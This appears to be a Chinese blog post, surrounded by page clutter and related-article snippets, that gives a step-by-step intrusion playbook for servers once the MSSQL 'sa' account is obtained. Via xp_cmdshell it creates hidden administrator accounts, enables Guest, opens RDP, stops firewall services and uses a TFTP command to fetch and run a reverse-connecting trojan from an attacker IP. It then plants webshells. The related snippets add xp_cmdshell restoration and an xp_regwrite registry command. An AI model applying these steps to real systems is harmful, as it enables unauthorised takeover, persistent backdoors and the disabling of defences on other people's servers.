讲解SA权限的渗透思路

最新推荐文章于 2024-05-29 08:45:00 发布
最新推荐文章于 2024-05-29 08:45:00 发布
阅读量827 收藏 3
点赞数 1
分类专栏: 网络安全篇 文章标签: sa权限 三朝看客 入侵
dangcafe
本文链接:https://blog.csdn.net/xaiodang/article/details/96436401
版权

一、直接执行命令提权得服务器
如果xp_cmdshell没有删除(如果被删,我们可以尝试恢复)

思路一

㈠ 执行命令探测相关信息

㈡ 根据相关信息提升权限
1.添加新用户并提升为管理员(用户名后加$,达到隐藏效果)
2.激活Guest,并提升为管理员

㈢ 查看终端服务(如果没开,我们可以尝试开33889)
1.先查看端口,如果开了3389,98%就是终端端口了
2.如果没开3389,用Net start查看开没有开终端服务(Terminal Service)。如果没开,尝试开启。

PS:提醒下的是还可开启Telnet服务,但已经是SA权限了,好像没什么不可能的了,开Telnet好像有点多此一举,但毕竟也是一种思路,就顺便说下。

㈣ 连接3389,得服务器权限。
如果连接失败,最大的可能就是防火墙了,用Net start命令查看服务,如发现有关防火墙的相关服务停掉相关服务。再连接。

PS:可考虑端口重定向绕过防火墙。

思路二

㈠ 执行命令探测相关信息

㈡ 利用TFTP下载反弹木马(如果TFTP.EXE被删,可尝试上传一个,或者写角本亦可下载)
TFTP命令是tftp -i IP get 反弹木马.exe C:\反弹木马.exe

㈢ 利用命令执行反弹木马

㈣ 成功获服务器肉鸡一台

二、先得Webshell,再通过Webshell提权

xp_cmdshell依赖的是sql的组件xplog70.dll这个动态连接库文件 如果xplog70.dll也被删,恢复XP_cmdshell已经无望,我们只有换种思路了。

PS:即使删除了xp_cmdshell和xplog70.dll,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell,利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,照样可以得到一个SHell。

思路三

㈠ 通过列目录找到Web目录

㈡ 上传写入一句话木马

㈢ 写入小马 再写大马

㈣ 成功得到Webshell 用webshell上传文件

㈤ 权限提升

三朝看客
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
服务器管理员账号sa,一次利用MSSQL的SA账户提权获取服务器权限
weixin_39542742的博客
07-29 937
遇到小人,把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之,发现相关信息一堆堆各种工具也用了不少 发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去,看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各...
mssql sa权限提权
qq_44881113的博客
07-20 458
1 找到mssql的配置文件,拿到密码,【数据库权限需要sa】 2 连接进入数据库 我们需要将xp_cmdshell打开【默认是关闭的】 Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll') 3 执行命令 exec master.dbo.xp_cmdshell 'whoami' ...
SA权限沙合模式提权方法
收集盒 Book box
05-08 581
<br />sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,也被一些人不断的再次提出来,为了方便自己记忆再写出来,在这种情况下,要执行命令,条件是要有xp_regwrite。<br /><br />首先开启沙盘模式:<br />exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1<br /><br />然后
SaaS 应用之权限管理设计
最新发布
CherryXieのblog
05-29 474
SaaS 应用中常见的权限设计细节。
SA权限的入侵及小议SA提权
heizistudio的专栏
11-28 1362
本篇讲解一次SA权限的入侵并小议SA提权。 试在NB里面恢复CMDSHELL、OACREAT都没有成功,所以开启SQLSERVERAGENT ;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--   还是没有成功,无奈之中希望寄托于沙盒模式,执行如下语句开启沙盒模式 ;execmaster..xp_
DB权限拿webshell_提权(语音)
11-28
DB权限拿webshell_提权(语音)
SQL Server SA权限总结经典技术
09-14
SQL Server SA权限总结经典技术 SQL Server SA权限总结经典技术是Database Administrators(DBA)和安全专家们经常会遇到的一个重要话题。本文将对SQL Server SA权限总结经典技术进行详细的总结和分析,并提供相关...
华为5G SA无线网络常见故障处理思路
02-27
本文将详细探讨几种常见的5G SA无线网络故障处理思路。 1. **SA接入类问题**: SA接入流程从系统消息广播开始,直至UE(用户设备)与gNodeB(5G基站)之间建立起RRC(Radio Resource Control)连接。如果UE无法...
sa权限下无xp_cmdshell下取权限又一简单方法.txt
07-18
sa权限下无xp_cmdshell下取权限又一简单方法.txt
sa权限的利用
10-06
sa权限的利用
Sa-Upfile 1.0(sa权限上传文件).asp
12-28
Sa-Upfile 1.0(sa权限上传文件).asp
SA权限的注入点直接上传文件
10-13
SA权限的注入点可以直接向服务器上传文件。。。
提权的几种方法
qq_54030686的博客
11-21 3512
提权的几种方法 本文主要介绍几种提权方法的原理以及对应工具脚本的使用 windows 主要分为 系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、窃取令牌提权、bypassuac提权,第三方软件/服务提权,WEB中间件漏洞提权等。 系统内核溢出提权(例如:巴西烤肉等) 使用systeminfo查看系统的补丁 使用未打补丁的exp进行攻击 wmic qfe get Caption,Description,HotFixID,InstalledOn 使用此条命令即可查看本机安装的补丁 也可以
转载]SA权限九种上传方法
m4nkey
02-04 1071
<br />刚看了一种方法,如果是注入点,利用管中窥豹以二进制的方式上传,上传的时候最好改下名,比如do.exe,上传到目标服务器可以改成do.cmd,等传上去之后用copy 命令改回来。<br />当然用啊d也可以上传,还有nbsi。<br />SA 权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。<br />一、NBSI的命令方法:写入一句话木SHELL,命令如下: echo ^<%eval request
SA提权辅助
信安路上……
03-18 540
SA提权辅助: 1.判断扩展存储是否存在: select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell' select count(*) from master.dbo.sysobjects where name='xp_regread' 恢复: exec sp_drop...
sa提权
a15914389907的博客
03-04 483
首先说一下具体的情况 一大牛发了一个shell 挂个txt收徒、 乱码了就算了 省的那大牛找我麻烦 心理就想着日一下看看 结果真不如人心愿 御剑开骚 哇塞 列目录 这下高兴之 不上图了 发现大牛踪迹 我想着那位收徒的也是吧 (他自己说的 只是路过的) 好了废话不多说直接开始 搞吧 上传一句话菜刀链接 习惯性的打开菜刀 虚拟终...
提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权
热门推荐
fendo
03-29 1万+
(一)、Mssql提权 必要条件:获取到mssql数据库最高权限用户sa的账号密码 Mssql默认端口:1433 Mssql最高权限用户:sa 得到sa密码之后,通过工具直接连接上去。 MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。 (二)、GetPass 提权 一款获取计算机
在Windows低权限下利用服务进行提权
大方子
09-01 4190
先介绍下一个工具----------&gt;AccessChk AccessChk是Sysinternals中的小工具,推荐用3.0版本的,新版存在一些bug。 利用这个工具用来检查用户和用户组对文件,目录,注册表项,全局对象和系统服务的权限,在实际配置权限过程中,如果权限设置不当,那么win服务就可能被用于提权   AccessChk的具体介绍可以看这:http://blog.51cto...
Sa提权sql语句大全
weixin_30376509的博客
08-09 173
Sa提权方式很多,而最快捷的方式就是shift粘滞键镜像劫持。这种Sa提权方法必须满足几个条件,数据库可以远程访问,服务器开启了终端远程访问也就是3389和粘滞键功能。这样就可以利用Microsoft SQL Server Management Studio或其他漏洞检测工具来连接远程数据库了。 个人推荐使用Microsoft SQL Server Management Studio,可...
Sa-Token 权限认证
05-13
Sa-Token 是一个基于 Spring 框架的轻量级权限认证框架,它提供了一系列的功能,比如:Session 管理、权限认证、单点登录等等。使用 Sa-Token 可以帮助开发者快速实现权限认证功能,同时也提供了较为完整的文档和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三朝看客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值